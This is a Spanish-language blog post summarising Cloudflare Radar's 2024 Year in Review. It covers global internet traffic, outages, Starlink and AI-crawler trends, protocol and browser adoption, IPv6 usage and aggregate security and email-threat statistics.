• El 41,3 % del tráfico global proviene de dispositivos móviles. En casi 100 países/regiones, la mayor parte del tráfico proviene de dispositivos móviles. 🔗

• El 20,7 % de las conexiones TCP se interrumpen de manera inesperada antes de que sea posible intercambiar datos útiles. 🔗

• El 6,5 % del tráfico global fue mitigado por los sistemas de Cloudflare como potencialmente malicioso o por razones definidas por el cliente.En Estados Unidos, el porcentaje de tráfico mitigado creció al 5,1 %, mientras que en Corea del Sur se redujo ligeramente a un 8,1 %. En 44 países/regiones, se mitigó más del 10 % del tráfico. 🔗

• Más de un tercio del tráfico global de bots provino de Estados Unidos. El 12,7 % del tráfico global de bots provino de Amazon Web Services, y el 7,8 % de Google. 🔗

• A nivel mundial, el sector de apuestas/videojuegos fue el más afectado, un poco por delante del sector financiero, que fue el más afectado en 2023.🔗

• Log4j, una vulnerabilidad descubierta en 2021, sigue siendo una amenaza constante y fue un objetivo frecuente durante todo 2024. 🔗

• La seguridad del enrutamiento, medida como porcentaje de rutas válidas RPKI y el porcentaje de espacio de direcciones IP cubierto, siguió mejorando a nivel global durante 2024. En 20024 observamos un aumento del 4,7 % en el espacio de direcciones IPv4 válidas RPKI y un aumento del 6,4 % en las rutas válidas RPKI. 🔗

• Se determinó que un promedio del 4,3 % de los correos electrónicos fue malicioso en 2024, aunque probablemente los picos que se observaron en marzo, abril y mayo influyeron en esta cifra. Los enlaces engañosos y el fraude de identidad fueron los dos tipos más comunes de amenazas que se encontraron en los mensajes de correo electrónico maliciosos. 🔗

• Más del 99 % de los correos electrónicos procesados por Cloudflare Email Security de los dominios de nivel superior (TLD) .bar, .rest, y .uno resultaron ser spam o maliciosos.🔗

En los últimos cuatro años (2020,2021, 2022,2023), hemos agregado información de Cloudflare Radar en un Resumen del Año que muestra los patrones de Internet en varias áreas durante ese año. El micrositio del Resumen del Año de Cloudflare Radar 2024 continúa esa tradición, con tablas, gráficos y mapas interactivos que puedes utilizar para analizar y comparar las tendencias de Internet más destacadas que se observaron durante este año que termina.

La red de Cloudflare actualmente abarca más de 330 ciudades en más de 120 países/regiones, procesa un promedio que supera las 63 millones de solicitudes HTTP(S) por segundo para millones de propiedades de Internet, y gestiona un promedio que supera las 42 millones de solicitudes DNS por segundo. Los datos que se generan con este uso, combinados con los datos de otras herramientas complementarias de Cloudflare, permiten que Radar brinde información exclusiva casi en tiempo real sobre los patrones y las tendencias de la seguridad, el tráfico, el rendimiento y el uso que observamos en Internet. 

El Resumen del Año 2024 está organizado en cinco secciones: Tráfico, Adopción y uso, Conectividad, Seguridad y Seguridad del correo electrónico, y abarca el periodo comprendido entre el 1 de enero y el 1 de diciembre de 2024. Este año hemos agregado varias métricas nuevas, como el tráfico de bots y rastreadores de IA, la cuota de mercado de motores de búsqueda y navegadores, la manipulación de conexiones y los dominios de nivel superior (TLD) "más peligrosos".Para garantizar la uniformidad, hemos mantenido la coherencia de las metodologías subyacentes con los cálculos de años anteriores. Puedes consultar las tendencias de 200 países/regiones en el micrositio; los lugares más pequeños o menos poblados no se incluyen debido a la falta de datos. Algunas métricas solo se muestran a nivel global, y no se muestran si se selecciona un país/región. 

A continuación, ofrecemos un resumen del contenido de las principales secciones del Resumen Anual (Tráfico, Adopción y uso, Conectividad, Seguridad y Seguridad del correo electrónico), junto con observaciones destacadas y conclusiones clave. Además, también hemos publicado una entrada complementaria en el blog que analiza específicamente las tendencias que se obseraron en los principales servicios de Internet .

Las principales conclusiones y el análisis en esta publicación solo ofrecen una perspectiva de alto nivel sobre la información exclusiva que se encuentra en el micrositio del Resumen del Año. Visita el micrositio y explora los distintos conjuntos de datos y las métricas en más detalle, como las tendencias que se observaron en tu país/región, las formas en que han cambiado estas tendencias con respecto a 2023 y la comparación con otros países/regiones de interés. Un análisis de Internet desde este punto de vista brinda información para que puedas tomar decisiones informadas sobre todo, desde el estado de seguridad y las prioridades informáticas de una organización hasta el desarrollo y la estrategia de productos. 

Podríamos decir que un punto de inflexión para el tráfico de Internet se produjo hace treinta años. La World Wide Web se generalizó en 1994, con el lanzamiento, a fines de 1993, del navegador NCSA Mosaic para varios sistemas operativos populares, que admitían imágenes incrustadas.A su vez, el contenido de Internet "más pesado" (en contraste con el contenido de texto) se convirtió en la norma, y junto con el aumento del consumo de servicios en línea y la industria emergente de los proveedores de servicios de Internet (ISP), el tráfico de Internet comenzó a crecer rápidamente, y esa tendencia ha continuado. hasta el presente.

Para determinar las tendencias del tráfico a lo largo del tiempo para el Resumen del Año, utilizamos el volumen de tráfico diario promedio (sin incluir el tráfico de bots) como referencia durante la segunda semana completa (del 8 al 15 de enero) de 2024. (Se toma como referencia la segunda semana para dar tiempo a que las personas vuelvan a sus rutinas escolares y laborales "habituales" después de las vacaciones de invierno y el día de Año Nuevo. El cambio porcentual que se muestra en el gráfico de tendencias de tráfico se calcula teniendo en cuenta el valor de referencia, no representa el volumen de tráfico absoluto de un país o región. La línea de tendencia representa un promedio de seguimiento de siete días que se utiliza para mitigar los cambios bruscos que se observan con los datos diarios en detalle. Para comparar las tendencias de tráfico de 2024 con los datos de 2023 y/u otras ubicaciones, haz clic en el icono "Comparar" en la parte superior derecha del gráfico.

Durante la primera mitad de 2024, el crecimiento del tráfico de Internet en todo el mundo pareció ser bastante limitado, a uno o dos puntos porcentuales a ambos lados del valor de referencia hasta mediados de agosto. Sin embargo, en ese momento el crecimiento empezó a acelerarse claramente, y aumentó de manera constante hasta fines de noviembre, con un crecimiento del 17,2 % en el año. Esta tendencia es similar a las que se observaron en 2023 y 2022, como comentamos en la publicación del blog Resumen del Año 2023.

^{Tendencias del tráfico de Internet en todo el mundo en 2024}

Guinea, en África Occidental, tuvo el crecimiento de tráfico de Internet más significativo en 2024, un 350 % por encima del valor de referencia. El crecimiento del tráfico no comenzó con fuerza hasta fines de febrero, y alcanzó un pico inicial a principios de abril. Se mantuvo entre un 100 % y un 200 % por encima del valor de referencia hasta septiembre, momento en que experimentó varios periodos de crecimiento de varias semanas. Si bien los periodos de crecimiento de tráfico de septiembre a noviembre también se produjeron en 2023, llegaron a un pico inferior al 90 % por encima del valor de referencia.

El impacto de las importantes interrupciones de Internet también es claramente visible cuando se observan los datos durante el año. Se observaron claramente dos importantes interrupciones de Internet en Cuba como factores determinantes de las considerables caídas del tráfico en octubre y noviembre. El 18 de octubre hubo una "desconexión total" del sistema eléctrico nacional en la isla, que duró un poco más de tres días. Solo un par de semanas después, el 6 de noviembre, los daños ocasionados por el huracán Rafael causaron cortes de energía generalizados en Cuba, lo que provocó otra gran caída en el tráfico de Internet. El tráfico se ha mantenido bajo debido a las dificultades de la infraestructura eléctrica de Cuba .

^{Tendencias del tráfico de Internet en 2024, Cuba}

Como comentamos con frecuencia en el blog de Cloudflare Radar y en las publicaciones de las redes sociales, los cortes de Internet ordenados por los gobiernos se producen con demasiada frecuencia, y el impacto de estas medidas también es claramente visible cuando se analizan los datos de tráfico en el largo plazo. En Bangladés, el gobierno ordenó un corte de la conectividad a Internet móvil el 18 de julio, en respuesta a las protestas estudiantiles. Poco después del corte de las redes móviles, también hubo una desconexión de las redes de banda ancha fija, lo que generó una pérdida casi total del tráfico de Internet del país. La conectividad se recuperó gradualmente en unos días, entre el 23 y el 28 de julio.

^{Tendencias del tráfico de Internet en 2024, Bangladés}

Como también observamos el año pasado, la celebración de las principales festividades también puede tener un impacto visible en el tráfico de Internet a nivel país. Por ejemplo, en países musulmanes como Indonesia y los Emiratos Árabes Unidos, durante la celebración de Eid al-Fitr, la festividad que marca el fin del ayuno del Ramadán, se observa una notable disminución del tráfico aproximadamente entre el 9 y el 10 de abril. 

^{Tendencias del tráfico de Internet en 2024, Indonesia y Emiratos Árabes Unidos}

En los últimos años, el Resumen del Año ha clasificado los servicios de Internet más populares. Estas clasificaciones ofrecen una perspectiva "general" y una docena de categorías más específicas, en función de análisis de datos de consultas anonimizadas de tráfico a nuestro solucionador de DNS público 1.1.1.1 de millones de usuarios de todo el mundo. Para estas clasificaciones, se agrupan los dominios que pertenecen a un único servicio de Internet.

Google volvió a ocupar el primer puesto, debido a su amplia cartera de servicios y a la popularidad del sistema operativo móvil Android (más información sobre el tema a continuación). Las plataformas de propiedad de Meta, Facebook, Instagram y WhatsApp también ocuparon los primeros 10 puestos.

La popularidad de la IA generativa siguió creciendo durante 2024, y en esta categoría, OpenAI volvió a ocupar el primer puesto, debido al éxito y a la popularidad que siguió teniendo ChatGPT. En las redes sociales, los cinco primeros puestos se mantuvieron con respecto a la clasificación de 2023 y 2022, con Facebook, TikTok, Instagram, X y Snapchat.

Estas clasificaciones en categorías, y las tendencias observadas por servicios específicos, se analizan en más detalle en otra publicación del blog, Desde ChatGPT hasta Temu: clasificación de los principales servicios de Internet de 2024.

Starlink, de SpaceX, sigue siendo el principal proveedor de acceso a Internet satelital, que ofrece conectividad a zonas sin servicios o con servicios insuficientes. Además de abrir nuevos mercados en 2024, Starlink también anunció acuerdos para brindar conectividad a bordo de varias aerolíneas, en cruceros y en trenes, y también para que los suscriptores puedan tener servicio de roaming con su suscripción utilizando Starlink Mini.

Analizamos los volúmenes de tráfico conjunto de Cloudflare relacionados con el sistema autónomo principal de Starlink (AS14593) para seguir el crecimiento del uso del servicio durante 2024. Al igual que las tendencias de tráfico analizadas anteriormente, el volumen de solicitudes que se muestra en la línea de tendencia del gráfico representa un promedio de los últimos siete días. Para comparar con los datos de 2023, haz clic en el icono "Comparar" en la parte superior derecha del gráfico. En las vistas comparativas, las líneas se escalan al valor máximo mostrado.

A nivel mundial, se observó un crecimiento uniforme y constante durante el año, con una aceleración en noviembre. Esta aceleración probablemente se deba al tráfico relacionado con importantes actualizaciones de software específicas de los clientes. 

^{Crecimiento del tráfico de Starlink en el mundo en 2024}

En muchos lugares, existe una demanda acumulada de proveedores de conectividad "alternativos" como Starlink, y en estos países/regiones, observamos un rápido crecimiento del tráfico cuando el servicio está disponible, como en Zimbabue. La disponibilidad del servicio se anunció el 7 de septiembre, y el tráfico en el país comenzó a crecer rápidamente casi de inmediato después del anuncio.

^{Crecimiento del tráfico de Starlink en Zimbabue en 2024}

En los nuevos mercados, el crecimiento del tráfico continúa después de ese aumento inicial. Por ejemplo, el servicio de Starlink comenzó a estar disponible en Malawi en julio de 2023 y durante 2024 el tráfico de Starlink procedente de este país se multiplicó por 38. Si bien el aumento de 38 veces en Malawi es impresionante, otros países también tuvieron un crecimiento significativo. En Georgia, un país de Europa del Este, el servicio comenzó a estar disponible el 1 de noviembre de 2023. Tras un ascenso lento, el tráfico empezó a crecer y se multiplicó por 100 durante 2024. En Paraguay,se anunció la disponibilidad del servicio el 21 de diciembre, comenzó a crecer a principios de enero, y registró un aumento que se multiplicó por más de 900 durante el año.

^{Crecimiento del tráfico de Starlink en Malawi en 2024}

Cloudflare Radar muestra a los usuarios las tendencias del tráfico de Internet durante un periodo de tiempo seleccionado, pero a nivel de país/región o red. Sin embargo, como hicimos en 2023, queríamos analizar nuevamente el tráfico que observó Cloudflare durante todo el año procedente de todo Internet versión IPv4. Para ello, podemos utilizar las curvas de Hilbert, que nos permiten visualizar una secuencia de direcciones IPv4 en un patrón bidimensional que mantiene las direcciones IP cercanas unas de otras, lo que permite que sean útiles para estudiar el espacio de direcciones IPv4 de Internet.

Con una curva de Hilbert, podemos visualizar el tráfico agregado de solicitudes IPv4 para Cloudflare desde el 1 de enero hasta el 1 de diciembre de 2024. En la visualización, agregamos las direcciones IPv4 a un nivel de /20, lo que significa que en el nivel de ampliación más alto, cada cuadrado representa el tráfico de 4096 direcciones IPv4. Este agregado se hace para que la cantidad de datos utilizados para la visualización sea manejable. (Si bien quisiéramos crear una visualización similar para el tráfico IPv6, la enormidad del espacio de direcciones IPv6 haría que el tráfico relacionado fuera muy difícil de ver en dicha visualización, especialmente porque Regional Internet Registries ha destinado una cantidad tan pequeña para la asignación).

En la visualización, las direcciones IP están agrupadas por propiedad, y para mucho del espacio de dirección IP que se muestra aquí, al pasar el mouse sobre el nivel de apertura de plano predeterminado se mostrará el Registro de Internet Regional (RIR) al que pertenece el bloque de dirección. Sin embargo, también hay una cantidad de bloques que fueron asignados antes de la existencia del sistema RIR, y estos están etiquetados con el nombre de la organización a la que pertenecen. Una apertura de plano progresiva muestra el sistema autónomo y el país/la región al que está asociado el bloque de dirección IP, y también el porcentaje de tráfico relativo al máximo. (Si se selecciona un país/una región, solo los bloques de dirección IP asociados con ese lugar son visibles). En general, los porcentajes de tráfico están indicados por un sombreado en función de una escala de color, y si bien una cantidad de bloques grandes sin sombrear son visibles, esto no significa necesariamente que el espacio de dirección asociado está sin utilizar, sino que se puede utilizar de una manera que no genera tráfico hacia Cloudflare.

^{Curva de Hilbert que muestra el tráfico de 2024 en forma global hacia Cloudflare a través de Internet IPv4}

El sombreado naranja/rojo más cálido en la visualización representa las áreas de mayor volumen de solicitudes, y oculto en una de esas áreas está el bloque de direcciones IP que tuvo el máximo volumen de solicitudes a Cloudflare durante 2024. Al igual que en 2023, este bloque de direcciones era 66.249.64.0/20, que pertenece a Google, y es uno de tantos utilizados por el rastreador web Googlebot para obtener contenido para la indexación de búsqueda. El uso de ese espacio de direcciones es una explicación probable del alto volumen de solicitudes, debido a la cantidad de propiedades web en la red de Cloudflare.

^{Vista ampliada de la curva de Hilbert que muestra el bloque de direcciones IPv4 que generó el mayor volumen de solicitudes}

Además de Google, los propietarios de otros prefijos en los 20 principales incluyen Alibaba, Microsoft, Amazon y Apple. Para explorar Internet IPv4 en más detalle, te recomendamos que vayas al micrositio del Resumen del Año y lo explores arrastrando y haciendo zoom para moverte en el espacio de direcciones IPv4.

Los bots y los rastreadores de IA han sido noticia durante 2024, ya que consumen contenido de manera voraz para entrenar modelos en constante evolución. Se ha generado una controversia, ya que no todos los bots y rastreadores respetan las directivas de los propietarios de contenido para restringir la actividad de rastreo. En julio, Cloudflare permitió a los clientes bloquear estos bots y rastreadores con solo un clic, y durante la Semana aniversario presentamos Auditoría de IA para dar aún más visibilidad y control a los propietarios de sitios web sobre la manera en que las plataformas de IA acceden a su contenido. 

El seguimiento de las tendencias de tráfico de los bots de IA nos ayuda a comprender mejor su actividad a lo largo del tiempo, y podemos observar cuáles son los más agresivos, cuáles tienen el mayor volumen de solicitudes, cuáles ejecutan rastreos de forma habitual, etc. El nuevo gráfico del tráfico de bots y rastreadores de IA en la página Traffic de Radar, que se lanzó en septiembre, brinda información sobre estas tendencias de tráfico recopiladas durante el periodo de tiempo seleccionado para los bots de IA más conocidos. 

Si observamos las tendencias de tráfico de dos de esos bots, podemos ver algunos patrones interesantes. Bytespider es un rastreador operado por ByteDance, el propietario chino de TikTok, y, según se informa, se utiliza para descargar datos para entrenar los modelos lingüísticos de gran tamaño (LLM) de ByteDance. La actividad de rastreo de Bytespider en general tuvo una tendencia a la baja durante 2024, y a fines de noviembre la actividad fue aproximadamente un 80-85 % inferior a la que se había observado a principios de año. ClaudeBot es el rastreador de Anthropic, que descarga datos para entrenar sus LLM que impulsan productos de IA como Claude. El tráfico de ClaudeBot parecía ser prácticamente inexistente hasta mediados de abril, salvo algunos pequeños picos que posiblemente representan ejecuciones de pruebas. El tráfico comenzó a aumentar a fines de abril, pero después de un pico inicial, disminuyó durante el resto del año.

^{Tendencias de tráfico de los rastreadores de IA Bytespider y ClaudeBot en 2024}

Las tendencias de tráfico de la lista completa de bots y rastreadores de IA se pueden encontrar en Cloudflare Radar Data Explorer.

El término "poscuántico" hace referencia a una nueva serie de técnicas de criptografía que están diseñadas para proteger los datos que tienen la capacidad de captar y almacenar los datos actuales para que sean descifrados por computadoras cuánticas lo suficientemente potentes en el futuro. El equipo de investigación de Cloudflare está investigando la criptografía poscuántica desde 2017.

En octubre de 2022, activamos el acuerdo de claves poscuánticas en nuestra red de manera predeterminada, pero para usarlo, los navegadores y los clientes también deben admitirlo. En 2024, Chrome 124 de Google lo activó de manera predeterminada el 17 de abril, y la adopción creció rápidamente tras el lanzamiento, lo que aumentó el nivel de solicitudes desde un poco más de 2 % hasta un 12 % en un mes, y al finalizar noviembre ese porcentaje alcanzó un 13 %. Esperamos que la adopción siga creciendo en 2025 debido a la compatibilidad con otros navegadores de Chromium, la compatibilidad predeterminada cada vez mayor con Mozilla Firefox y las pruebas iniciales en Safari de Apple.

^{Tendencias de crecimiento en el tráfico TLS 1.3 cifrado poscuántico durante 2024}

Los dos principales sistemas operativos para dispositivos móviles del mundo son iOS de Apple y Android de Google, y al analizar la información del agente de usuario notificado con cada solicitud, podemos obtener información sobre la distribución del tráfico por sistema operativo del cliente durante el año. Una vez más, descubrimos que Android genera la mayor parte del tráfico de dispositivos móviles a nivel mundial, debido a su amplia variedad de precios, formatos y funciones.

Al igual que en los resultados de 2023, Android volvió a generar algo más de dos tercios del tráfico de dispositivos móviles. Si observamos los principales países con tráfico de Android, encontramos un porcentaje de más del 95 % en Sudán, Bangladés, Turkmenistán, Malawi, Papúa Nueva Guinea, Siria y Yemen, en 2023 solo eran dos países. Este año, al igual que el año pasado, también volvimos a observar que los países/las regiones donde más se usa Android se encuentran principalmente en África, Oceanía/Asia y Sudamérica, y que muchos tienen niveles más bajos de ingresos nacionales brutos per cápita. En estos países/regiones, la disponibilidad de dispositivos Android "de menor costo" tiene que ver con esa mayor adopción.

^{Distribución global del tráfico de dispositivos móviles por sistema operativo en 2024}

En cambio, la adopción de iOS alcanza un máximo del 65 % en Jersey, Islas Feroe, Guernsey y Dinamarca. Se observaron tasas de adopción del 50 % o más en un total de 26 países/regiones, que incluyen Noruega, Suecia, Australia, Japón, Estados Unidos y Canadá. Es probable que estos lugares tengan una mayor capacidad para comprar dispositivos de mayor precio, ya que el ingreso nacional bruto per cápita es comparativamente más alto.

^{Países/regiones con el mayor porcentaje de tráfico de iOS en 2024}

HTTP (protocolo de transferencia de hipertexto) es el protocolo principal en el que se basa la web . El HTTP/1.0 se estandarizó por primera vez en 1996, el HTTP/1.1 en 1999 y el HTTP/2 en 2015. La versión más reciente, HTTP/3, se completó en 2022 y se ejecuta sobre un nuevo protocolo de transporte que se conoce como QUIC. Al ejecutarse sobre QUIC, el HTTP/3 puede ofrecer un mejor rendimiento al mitigar los efectos de la pérdida de paquetes y los cambios de red, y al establecer conexiones más rápidas. El HTTP/3 también brinda encriptación predeterminada, lo que mitiga el riesgo de ataques. 

Las versiones actuales de Google Chrome para computadoras y dispositivos móviles (y las variantes de Chromium), Mozilla Firefox y Safari de Apple son compatibles con HTTP/3 de manera predeterminada. Cloudflare ofrece HTTP/3 de forma gratuita a todos nuestros clientes, aunque no todos lo habilitan.

El análisis de la versión HTTP negociada para cada solicitud brinda información sobre la distribución del tráfico de las distintas versiones del protocolo en conjunto durante todo el año. (“HTTP/1.x” agrega las solicitudes que se hacen a través de HTTP/1.0 y HTTP/1.1.) A nivel global, el 20,5 % de las solicitudes de 2024 se hicieron mediante HTTP/3. Otro 29,9 % de las solicitudes se hicieron a través del anterior HTTP/1.x mientras que HTTP/2 siguió dominando, y representó el 49,6 % restante.

^{Distribución global del tráfico por versión HTTP en 2024}

Si observamos la distribución de versiones por área geográfica, encontramos que ocho países/regiones envían más de un tercio de sus solicitudes a través de HTTP/3 y los cinco principales son Reunión, Sri Lanka, Mongolia, Grecia y Macedonia del Norte. Otros ocho países/regiones, entre los que se incluyen Irán, Irlanda, Hong Kong y China, enviaron más de la mitad de sus solicitudes a través de HTTP/1.x durante 2024. Más de la mitad de las solicitudes se hicieron a través de HTTP/2 en un total de 147 países/regiones.

^{Países/regiones con el mayor porcentaje de tráfico HTTP/3 en 2024}

Los sitios web y las aplicaciones modernos son sumamente complejos, se desarrollan e integran en una combinación de marcos, plataformas, servicios y herramientas. Para ofrecer una experiencia de usuario eficiente, los desarrolladores deben verificar que todos estos componentes coexistan sin problemas entre sí. Con URL Scanner de Cloudflare Radar, volvimos a analizar los sitios web relacionados con los 5000 dominios principales para identificar las tecnologías y los servicios más populares utilizados en una docena de categorías diferentes. 

En cuanto a las principales tecnologías que se utilizaron para crear sitios web, React tuvo una ventaja dominante sobre Vue.js y otros marcos de JavaScript, PHP fue la tecnología de programación más popular, y la participación de jQuery fue 10 veces mayor que la de otras bibliotecas populares de JavaScript.

Los sitios web y las aplicaciones también utilizan servicios y plataformas de terceros para apoyar funciones como el análisis, la gestión de contenidos y la automatización del marketing. Google Analytics siguió siendo el proveedor de análisis más utilizado, WordPress tuvo un porcentaje de más del 50 % entre los sistemas de gestión de contenido, y para los proveedores de automatización de marketing, el líder de la categoría, HubSpot, tuvo casi el doble de porcentaje de uso que Marketo y MailChimp.

^{Principales tecnologías de sitios web, categoría de marcos de JavaScript en 2024}

Muchos sitios web y aplicaciones dinámicos se basan en llamadas API automatizadas, y podemos utilizar nuestra visibilidad exclusiva del tráfico web para identificar los principales lenguajes en los que están escritos estos clientes API . La aplicación de la heurística a las solicitudes relacionadas con la API que se determinaron que no provenían de una persona que estaba utilizando un navegador o una aplicación móvil nativa nos ayuda a identificar el lenguaje utilizado para crear el cliente API.

Nuestro análisis reveló que casi el 12 % de las llamadas API automatizadas las hacen clientes de Go, y que NodeJS, Python, Java y .NET tienen porcentajes menores. Con respecto a 2023, la participación de Go aumentó aproximadamente un 40 %, lo que le permitió alcanzar el primer puesto, mientras que el porcentaje de NodeJS cayó un poco más del 30 %. Python y Java también aumentaron sus porcentajes mientras que el de .NET disminuyó.

^{Lenguajes de clientes API más populares en 2024}

Al proteger y agilizar los sitios web y las aplicaciones de millones de clientes, Cloudflare se encuentra en una posición única para medir los datos de porcentajes de mercado de los motores de búsqueda. Nuestra metodología utiliza el encabezado de referencia de HTTP para identificar el motor de búsqueda que envía tráfico a los sitios y las aplicaciones de los clientes. Los datos del porcentaje de mercado se presentan en forma combinada, y también desglosados por tipo de dispositivo y sistema operativo. (Los datos del tipo de dispositivo y del sistema operativo provienen de los agentes de usuario y las indicaciones del cliente que acompañan a una solicitud de contenido).

A nivel global, Google derivó la mayor parte del tráfico a los clientes de Cloudflare, con un porcentaje de más del 88 % en 2024. Yandex, Baidu, Bing y DuckDuckGo completan los cinco primeros puestos, todos con porcentajes de un solo dígito. 

^{Porcentaje de mercado global de motores de búsqueda en 2024}

Sin embargo, al desglosar por ubicación o plataforma, las diferencias son evidentes en los principales motores de búsqueda y sus porcentajes. Por ejemplo, en Corea del Sur, Google genera solo dos tercios de las referencias, mientras que la plataforma local Naver impulsa el 29,2 %, y el portal local Daum también se encuentra entre los cinco primeros con un 1,3 %.

^{Porcentaje de mercado de motores de búsqueda en Corea del Sur en 2024}

El predominio de Google también se ve algo mitigado en los dispositivos de Windows, donde solo genera el 80 % de las referencias a nivel mundial. Como era de esperar, Bing ocupa el segundo lugar para los usuarios de Windows, con un porcentaje del 10,4 %. Yandex, Yahoo y DuckDuckGo completan los primeros 5 puestos, todos ellos con porcentajes inferiores al 5 %.

^{Porcentaje de mercado global de motores de búsqueda para dispositivos de Windows en 2024}

Para obtener más información, que incluye motores de búsqueda combinados en "Otros", consulta los informes trimestrales de referencia de motores de búsqueda en Cloudflare Radar.

Al igual que nuestra capacidad para medir el porcentaje de mercado de los motores de búsqueda, Cloudflare también se encuentra en una posición única para medir el porcentaje de mercado de los navegadores. Nuestra metodología utiliza información de los encabezados de los agentes de usuario y de las indicaciones del cliente para identificar el navegador que hace las solicitudes de contenido, junto con el sistema operativo relacionado. Los datos del porcentaje de mercado se presentan en forma combinada, y también desglosados por tipo de dispositivo y sistema operativo. Ten en cuenta que los porcentajes de navegadores disponibles tanto en computadoras de escritorio como en dispositivos móviles, como Chrome o Safari, se presentan de forma combinada.

A nivel mundial, descubrimos que el 65,8 % de las solicitudes procedían del navegador Chrome de Google en 2024, y que solo el 15,5 % procedían del navegador Safari de Apple. Microsoft Edge, Mozilla Firefox y el navegador de Internet de Samsung completaron los cinco primeros puestos, con porcentajes inferiores al 10 %.

^{Porcentaje en el mercado global de navegadores web en 2024}

Al igual que en las estadísticas de los motores de búsqueda comentadas anteriormente, las diferencias son claramente visibles al desglosar por ubicación o plataforma. En algunos países donde iOS tiene un porcentaje de mercado mayor que Android, Chrome sigue siendo el navegador líder, pero por un margen mucho menor. Por ejemplo, en Suecia, la participación de Chrome cayó al 56,2 %, mientras que la de Safari aumentó al 22,5 %. En Noruega, Chrome cayó al 50 %, mientras que Safari creció al 25,6 %.

^{Participación en el mercado global de navegadores web en Noruega en 2024}

Como navegador predeterminado en los dispositivos con iOS, Safari de Apple fue el navegador más popular para dispositivos iOS, con una participación en el mercado del 81,7 % durante todo el año, mientras que Chrome solo alcanzó el 16,1 %. Y, a pesar de ser el navegador predeterminado que ya viene instalado en los dispositivos de Windows, Edge solo tuvo un porcentaje del 17,3 %, en comparación con el 68,5 % de Chrome.

^{Porcentaje en el mercado global de navegadores web para dispositivos iOS en 2024}

Para obtener más información, incluidos los navegadores agrupados en "Otros", consulta los informes trimestrales de porcentaje del mercado de los navegadores en Cloudflare Radar.

Durante 2024, al igual que en los últimos años, hemos escrito con frecuencia sobre las interrupciones de Internet que observamos, ya sea debido a cortes de cable, problemas técnicos no especificados, cortes ordenados por el gobierno o una serie de otras razones que tratamos en nuestras publicaciones trimestrales (T1, T2, T3). Los impactos de estas interrupciones pueden ser significativos, como importantes pérdidas económicas y graves limitaciones en las comunicaciones. El Cloudflare Radar Outage Center hace un seguimiento de estas interrupciones de Internet y utiliza los datos de tráfico de Cloudflare para obtener información sobre su alcance y duración.

Algunas de las interrupciones que se observaron durante el año fueron breves, de solo unas horas, mientras que otras se prolongaron durante días o semanas. En la última categoría, una interrupción de Internet en Haití se prolongó durante ocho días en septiembre, porque los equipos de reparación no pudieron acceder a un cable submarino dañado debido a un conflicto comercial, mientras que los cortes de los proveedores de Internet móvil y fijo en Bangladés se prolongaron durante aproximadamente 10 días en Julio. En la primera categoría, Irak experimentó con frecuencia interrupciones de Internet de varias horas en todo el país con el fin de evitar que los estudiantes se copiaran en los exámenes académicos, lo que explica la agrupación visible en la línea cronológica durante junio, julio, agosto y septiembre.

En la línea cronológica del micrositio del Resumen del Año, al pasar el cursor sobre un punto se mostrarán metadatos sobre esa interrupción, y al hacer clic en él se abrirá una página con información adicional. Debajo del mapa y de la línea cronológica, hemos agregado un gráfico de barras que muestra los motivos registrados que están relacionados con las interrupciones observadas. En 2024, más de la mitad se debieron a interrupciones impuestas por los gobiernos. Si se selecciona un país/región, solo se mostrarán las interrupciones y los motivos de ese país/región.

^{Se observaron más de 200 interrupciones de Internet en todo el mundo durante 2024}

El protocolo IPv4 que aún utilizan muchos dispositivos conectados a Internet se desarrolló en la década de 1970, y no fue diseñado para manejar la vasta y creciente escala de la Internet moderna. En diciembre de 1995 se publicó una especificación inicial para su sucesor, IPv6, que tres años más tarde se convirtió en un proyecto de norma que ofrecía un espacio de direcciones ampliado para admitir mejor el crecimiento previsto de dispositivos conectados a Internet. En este momento, el espacio de IPv4 disponible hace tiempo que se ha agotado, y los proveedores de conectividad utilizan soluciones como traducción de direcciones de red para ampliar los recursos limitados de IPv4. Los proveedores de servicios de nube y alojamiento, cada vez más ávidos de espacio de direcciones IPv4 a medida que crecen sus negocios e infraestructura, están adquiriendo bloques de espacio de direcciones IPv4 por un precio que oscila entre los 30 y los 50 dólares por dirección. 

Cloudflare es un firme y activo defensor de IPv6 desde 2011, cuando anunciamos nuestra gateway IPv6 automática, que permitía la compatibilidad gratuita con IPv6 para todos nuestros clientes. En 2014, habilitamos la compatibilidad con IPv6 de forma predeterminada para todos nuestros clientes, pero no todos deciden mantenerla habilitada por diversas razones. Hay que tener en cuenta que la compatibilidad con el servidor es solo la mitad de la ecuación para impulsar la adopción de IPv6, ya que las conexiones de los usuarios finales también deben ser compatibles. (En realidad, es un poco más complejo que eso, pero la compatibilidad con el servidor y con el cliente en todas las aplicaciones, sistemas operativos y entornos de red son los dos requisitos principales. Desde la perspectiva de la red, la implementación de IPv6 también aporta otras ventajas). Al analizar la versión IP utilizada para cada solicitud que se hace a Cloudflare, agregada durante el año, podemos obtener información sobre la distribución del tráfico por las distintas versiones del protocolo.

A nivel global, el 28,5 % de las solicitudes compatibles con IPv6 (doble pila) se hicieron a través de IPv6, frente al 26,4 % en 2023. India fue de nuevo el país con el mayor nivel de adopción de IPv6, con un 68,9 %, en gran medida debido al 94 % de adopción de IPv6 en Reliance Jio, uno de los mayores proveedores de acceso a Internet del país.A la India le siguió de cerca Malasia, donde el 59,6 % de las solicitudes de doble pila se hicieron a través de IPv6 durante 2024, debido a los altos índices de adopción de IPv6 de los principales proveedores de Internet del país. La adopción de IPv6 en la India aumentó del 66 % en 2023, y en Malasia, del 57,3 % el año pasado. Arabia Saudita fue el único otro país con un índice de adopción de IPv6 superior al 50 % este año, con un 51,8 %, mientras que esa lista también incluía a Vietnam,Grecia, Francia, Uruguay y Tailandia en 2023.Treinta y cuatro países/regiones, entre estos muchos de África, siguen teniendo índices de adopción de IPv6 inferiores al 1 %, mientras que un total de 96 países/regiones tienen índice de adopción inferiores al 10 %.

^{Distribución global del tráfico por versión de IP en 2024}

^{Países/regiones con el mayor porcentaje de tráfico IPv6 en 2024}

